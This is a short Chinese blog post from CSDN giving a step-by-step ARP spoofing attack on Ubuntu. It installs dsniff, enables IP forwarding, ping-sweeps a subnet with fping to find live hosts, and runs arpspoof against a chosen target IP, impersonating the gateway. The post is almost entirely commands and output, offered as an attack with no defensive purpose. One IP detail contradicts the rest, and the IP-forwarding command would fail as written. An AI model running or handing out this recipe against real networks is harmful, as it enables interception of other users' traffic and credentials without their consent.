【Ubuntu】Ubuntu下面ARP攻击

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/xiaoxiao133/article/details/86241191

参考链接:
1、https://zhidao.baidu.com/question/2120190401255396027.html

步骤1:
在Ubuntu终端安装命令:

sudo apt-get install dsniff ssldump
sudo echo 1 > /proc/sys/net/ipv4/ip_forward 
sudo apt-get install fping

使用ifconfig查看你的IP:172.16.29.133,攻击IP:172.16.29.132
DNS:172.16.29.1

假设你的IP是192.168.1.110
步骤2:

fping -g 172.16.29.1/24
172.16.29.97 is alive
172.16.29.98 is alive
172.16.29.99 is alive
172.16.29.108 is alive
172.16.29.132 is alive
172.16.29.133 is alive
172.16.29.254 is alive
ICMP Host Unreachable from 172.16.29.133 for ICMP Echo sent to 172.16.29.1
ICMP Host Unreachable from 172.16.29.133 for ICMP Echo sent to 172.16.29.1

步骤3:
调用arpspoof攻击IP:172.16.29.132

sudo -s arpspoof -i eno1 -t 172.16.29.132 172.16.29.1

猜你喜欢

转载自blog.csdn.net/xiaoxiao133/article/details/86241191